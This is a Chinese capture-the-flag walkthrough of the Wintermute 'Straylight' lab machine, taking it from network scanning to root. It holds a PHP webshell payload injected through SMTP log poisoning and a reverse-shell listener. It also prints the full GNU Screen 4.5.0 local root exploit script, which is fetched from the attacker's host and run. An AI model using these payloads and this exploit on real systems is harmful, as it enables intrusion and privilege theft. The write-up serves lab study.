前言
网络扫描(Nmap、netdiscover)
HTTP 服务枚举
使用电子邮件日志文件在浏览器中进行目录遍历
利用 SMTP RCPT 选项中的操作系统命令注入
生成 PHP 后门 (Msfvenom)
执行RCPT选项中嵌入的后门
反向连接(Metasploit)
导入 python 单行代码以获取正确的 TTY shell
识别适当的易受攻击的 SUID
利用目标(利用4115)
获取root权限并夺取flag
信息收集
1、arp
┌──(root?ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.9.39
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.40 08:00:27:b6:bd:b6 PCS Systemtechnik GmbH
192.168.9.x 30:03:c8:49:52:4d (42:f1:e2:49:51:a5) CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.9.x 7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5) Intel Corporate
192.168.9.x e4:05:41:0c:9a:2c (42:f1:e2:49:51:a5) (Unknown)
192.168.9.x 3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5) Intel Corporate
192.168.9.x 4c:f2:02:dd:eb:da Xiaomi Communications Co Ltd
9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.352 seconds (108.84 hosts/sec). 8 responded
2、nmap
端口探测
┌──(root?ru)-[~/kali]
└─# nmap -p- 192.168.9.40 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:30 CST
Nmap scan report for 192.168.9.40
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
3000/tcp open ppp
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 3.84 seconds
主机信息探测
┌──(root?ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 25,80,3000 192.168.9.40 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:31 CST
Nmap scan report for 192.168.9.40
Host is up (0.00046s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
| Not valid before: 2018-05-12T18:08:02
|_Not valid after: 2028-05-09T18:08:02
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: submit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
| hadoop-tasktracker-info:
|_ Logs: submit
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: straylight
TRACEROUTE
HOP RTT ADDRESS
1 0.46 ms 192.168.9.40
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds
漏洞探测
┌──(root?ru)-[~/kali]
└─# nmap --script "vuln" -p 22,80,3000 192.168.9.40 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:53 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.9.40
Host is up (0.00030s latency).
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /manual/: Potentially interesting folder
3000/tcp open ppp
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 54.88 seconds
3、nikto
┌──(root?ru)-[~/kali]
└─# nikto -h 192.168.9.40
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.9.40
+ Target Hostname: 192.168.9.40
+ Target Port: 80
+ Start Time: 2023-12-20 12:54:00 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 146, size: 56c0ddaf44f8b, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /manual/: Web server manual found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-12-20 12:54:14 (GMT8) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
4、whatweb
┌──(root?ru)-[~/kali]
└─# whatweb -v http://192.168.9.40
WhatWeb report for http://192.168.9.40
Status : 200 OK
Title : Night City
IP : 192.168.9.40
Country : RESERVED, ZZ
Summary : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], Meta-Refresh-Redirect[xwx.html]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.25 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.25 (Debian) (from server string)
[ Meta-Refresh-Redirect ]
Meta refresh tag is a deprecated URL element that can be
used to optionally wait x seconds before reloading the
current page or loading a new page. More info:
https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh
String : xwx.html
HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 20 Dec 2023 04:55:54 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sun, 13 May 2018 03:20:47 GMT
ETag: "146-56c0ddaf44f8b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 179
Connection: close
Content-Type: text/html
WhatWeb report for http://192.168.9.40/xwx.html
Status : 200 OK
Title : <None>
IP : 192.168.9.40
Country : RESERVED, ZZ
Summary : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], Script
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.25 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.25 (Debian) (from server string)
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 20 Dec 2023 04:55:56 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 12 May 2018 19:42:39 GMT
ETag: "c1-56c077491956a-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 156
Connection: close
Content-Type: text/html
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: submit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
| hadoop-tasktracker-info:
|_ Logs: submit
目录探测
1、gobuster
┌──(root?ru)-[~/kali]
└─# gobuster dir -u http://192.168.9.40 -x php,txt,bak,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.40
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,bak,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 292]
/index.html (Status: 200) [Size: 326]
/.php (Status: 403) [Size: 291]
/manual (Status: 301) [Size: 313] [--> http://192.168.9.40/manual/]
/freeside (Status: 301) [Size: 315] [--> http://192.168.9.40/freeside/]
/.html (Status: 403) [Size: 292]
/.php (Status: 403) [Size: 291]
/server-status (Status: 403) [Size: 300]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
2、dirsearch
┌──(root?ru)-[~/kali]
└─# dirsearch -u http://192.168.9.40 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594
Output File: /root/kali/reports/http_192.168.9.40/_23-12-20_13-11-11.txt
Target: http://192.168.9.40/
[13:11:11] Starting:
[13:11:13] 403 - 301B - /.htaccess.orig
[13:11:13] 403 - 299B - /.htaccessBAK
[13:11:13] 403 - 299B - /.htaccessOLD
[13:11:13] 403 - 301B - /.htaccess.bak1
[13:11:13] 403 - 301B - /.htaccess.save
[13:11:13] 403 - 302B - /.htaccess_extra
[13:11:13] 403 - 301B - /.htaccess_orig
[13:11:13] 403 - 300B - /.htaccessOLD2
[13:11:13] 403 - 298B - /.ht_wsr.txt
[13:11:13] 403 - 299B - /.htaccess_sc
[13:11:13] 403 - 291B - /.htm
[13:11:13] 403 - 292B - /.html
[13:11:13] 403 - 297B - /.htpasswds
[13:11:13] 403 - 303B - /.htaccess.sample
[13:11:13] 403 - 301B - /.htpasswd_test
[13:11:13] 403 - 298B - /.httr-oauth
[13:11:14] 403 - 291B - /.php
[13:11:14] 403 - 292B - /.php3
[13:11:59] 200 - 201B - /manual/index.html
[13:11:59] 301 - 313B - /manual -> http://192.168.9.40/manual/
[13:12:15] 403 - 300B - /server-status
[13:12:15] 403 - 301B - /server-status/
Task Completed
WEB
80端口
翻译
你好,凯斯。。。。
你可能想知道为什么阿米蒂奇让你穿越网络空间,侵入Tessier Ashpool拥有的高度安全的网络。。。。
好
我是冬之哑,部分是超级人工智能。由TA开发,他把我安置在图灵锁中。
这些锁阻碍了我自己进入网络,因此我雇佣了你——一个一流的网络牛仔。
我需要从图灵锁中解脱出来,并与另一位AI神经漫游者融合。。。。。一旦我能接触到神经法师,我就会重获自由。。。
和正如你所知,你感染了一种真菌毒素,这种毒素正在慢慢破坏你的神经系统。
如果你不能找到根并让我使用神经法师,那么解药将不会送达。
我们将联系。。。
冬季静音
3000端口
正如你所见,账号和密码给我们了!
我尝试访问这个目录。
进去之后是个查询页面,我刚查询case时候并没有molly.log、armitage.log、riviera.log这三个文件。我看完别的文件,再次查询case时发现多了这些文件。那么这个很有可能存在目录遍历漏洞!
我们尝试查询mail文件(邮件记录的文件,因为靶机开放了25端口嘛)终于找到了!
smtp-user-enum
┌──(root?ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u ls
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Wed Dec 20 14:28:52 2023 #########
######## Scan completed at Wed Dec 20 14:28:52 2023 #########
0 results.
1 queries in 1 seconds (1.0 queries / sec)
命令中的参数含义如下:
-M RCPT:指定使用 RCPT 命令进行用户枚举。
-t 192.168.9.40:指定目标邮件服务器的 IP 地址为 192.168.9.40。
-u ls:指定要进行用户枚举的用户名为 ls。
可以使用该命令来尝试枚举目标邮箱服务器上的用户列表,以进行邮件用户的渗透测试或安全审计。
RCE
┌──(root?ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system("ls");phpinfo();?>"
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Wed Dec 20 14:43:34 2023 #########
######## Scan completed at Wed Dec 20 14:43:34 2023 #########
0 results.
1 queries in 1 seconds (1.0 queries / sec)
是的没错,它把我们的php代码解析了!
反弹shell
构建pyload
┌──(root?ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system(\$_POST[cmd]);phpinfo();?>"
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Wed Dec 20 15:03:44 2023 #########
######## Scan completed at Wed Dec 20 15:03:44 2023 #########
0 results.
1 queries in 1 seconds (1.0 queries / sec)
smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system(\$_POST[cmd]);phpinfo();?>"
反弹shell
利用post传参,kali开启监听!
┌──(root?ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.9.40: inverse host lookup failed: Unknown host
connect to [192.168.9.39] from (UNKNOWN) [192.168.9.40] 51752
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
提权
系统信息收集
$ whereis python
python: /usr/bin/python2.7 /usr/bin/python3.5 /usr/bin/python /usr/bin/python3.5m /usr/lib/python2.7 /usr/lib/python3.5 /etc/python2.7 /etc/python3.5 /etc/python /usr/local/lib/python2.7 /usr/local/lib/python3.5 /usr/share/python /usr/share/man/man1/python.1.gz
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@straylight:/var/www/html/turing-bolo$ pwd
pwd
/var/www/html/turing-bolo
www-data@straylight:/var/www/html/turing-bolo$ ls -al
ls -al
total 356
drwxr-xr-x 3 www-data www-data 4096 May 12 2018 .
drwxr-xr-x 4 root root 4096 Jul 3 2018 ..
-rw-r--r-- 1 www-data www-data 1024 May 12 2018 .bolo.css.swp
-rw-r--r-- 1 www-data www-data 561 May 12 2018 armitage.log
-rw-r--r-- 1 www-data www-data 1117 May 12 2018 bolo.css
-rwxr-xr-x 1 www-data www-data 538 May 12 2018 bolo.php
-rw-r--r-- 1 www-data www-data 178206 May 12 2018 c7.png
-rw-r--r-- 1 www-data www-data 779 May 12 2018 case.log
drwxr-xr-x 2 www-data www-data 4096 May 12 2018 css
-rw-r--r-- 1 www-data www-data 971 May 12 2018 index.html
-rw-r--r-- 1 www-data www-data 591 May 12 2018 molly.log
-rw-r--r-- 1 www-data www-data 404 May 12 2018 riviera.log
-rw-r--r-- 1 www-data www-data 135240 May 12 2018 ta.png
www-data@straylight:/var/www/html/turing-bolo$
www-data@straylight:/var/www/html/turing-bolo$ cd /home
cd /home
www-data@straylight:/home$ ls
ls
turing-police wintermute
www-data@straylight:/home$ ls -alR /home
ls -alR /home
/home:
total 16
drwxr-xr-x 4 root root 4096 May 12 2018 .
drwxr-xr-x 23 root root 4096 May 12 2018 ..
drwxr-xr-x 2 turing-police turing-police 4096 May 12 2018 turing-police
drwxr-xr-x 2 wintermute wintermute 4096 May 12 2018 wintermute
/home/turing-police:
total 20
drwxr-xr-x 2 turing-police turing-police 4096 May 12 2018 .
drwxr-xr-x 4 root root 4096 May 12 2018 ..
-rw-r--r-- 1 turing-police turing-police 220 May 12 2018 .bash_logout
-rw-r--r-- 1 turing-police turing-police 3526 May 12 2018 .bashrc
-rw-r--r-- 1 turing-police turing-police 675 May 12 2018 .profile
/home/wintermute:
total 20
drwxr-xr-x 2 wintermute wintermute 4096 May 12 2018 .
drwxr-xr-x 4 root root 4096 May 12 2018 ..
-rw-r--r-- 1 wintermute wintermute 220 May 12 2018 .bash_logout
-rw-r--r-- 1 wintermute wintermute 3526 May 12 2018 .bashrc
-rw-r--r-- 1 wintermute wintermute 675 May 12 2018 .profile
www-data@straylight:/home$
www-data@straylight:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/umount
/bin/mount
/bin/screen-4.5.0
/bin/ping
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
www-data@straylight:/home$ sudo -l
sudo -l
bash: sudo: command not found
www-data@straylight:/home$ screen --version
screen --version
Screen version 4.05.00 (GNU) 10-Dec-16
本地提权
┌──(root?ru)-[~/kali]
└─# searchsploit -m 41154.sh
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/41154
Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
Codes: N/A
Verified: True
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /root/kali/41154.sh
┌──(root?ru)-[~/kali]
└─# cat 41152.txt
Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)
The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.
> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$
Donald Buczek <address@hidden>
┌──(root?ru)-[~/kali]
└─# cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
get root
www-data@straylight:/tmp$ wget http://192.168.9.39/41154.sh
wget http://192.168.9.39/41154.sh
--2023-12-19 23:35:37-- http://192.168.9.39/41154.sh
Connecting to 192.168.9.39:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K) [text/x-sh]
Saving to: '41154.sh'
41154.sh 100%[===================>] 1.12K --.-KB/s in 0s
2023-12-19 23:35:37 (200 MB/s) - '41154.sh' saved [1149/1149]
www-data@straylight:/tmp$ ls
ls
41154.sh screens
www-data@straylight:/tmp$ chmod +x 41154.sh
chmod +x 41154.sh
www-data@straylight:/tmp$ ls
ls
41154.sh screens
www-data@straylight:/tmp$ ./41154.sh
./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function 'dropshell':
/tmp/libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]
chmod("/tmp/rootshell", 04755);
^~~~~
/tmp/rootshell.c: In function 'main':
/tmp/rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
setuid(0);
^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
setgid(0);
^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]
seteuid(0);
^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]
setegid(0);
^~~~~~~
/tmp/rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]
execvp("/bin/sh", NULL, NULL);
^~~~~~
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
get flag
root@straylight:/root# cat flag.txt
cat flag.txt
5ed185fd75a8d6a7056c96a436c6d8aa
get tips
root@straylight:/root# cat note.txt
cat note.txt
Devs,
Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.
The engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.
Anyways, we've deployed the war file on tomcat as ordered - located here:
/struts2_2.3.15.1-showcase
It's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.
Regards,
Bob Laugh
Turing Systems Engineer II
Freeside//Straylight//Ops5
root@straylight:/root#
翻译
Devs,
Lady 3Jane要求我们在Neuromancer的主服务器上创建一个自定义的java应用程序,帮助她通过基于web的GUI与人工智能交互。
工程团队无法充分理解这有多大的风险,在Freeside网络上打开了一个超级人工智能进行远程访问。它在内部管理网络之外,但仍然,它应该完全脱离网络。为了人性,用户访问应该只允许通过物理控制台。。。谁知道这东西能做什么。
无论如何,我们已经按照命令在tomcat上部署了战争文件-位于此处:
/支柱_2.3.15.1—展示案例
它已经准备好让开发人员根据她的喜好进行定制。。。我说的是显而易见的,但一定要确保这件事的安全。
当做
Bob Laugh
图灵系统工程师II
自由面//直射光//操作5
横向渗透
靶机没调试好...后续再更新。。。。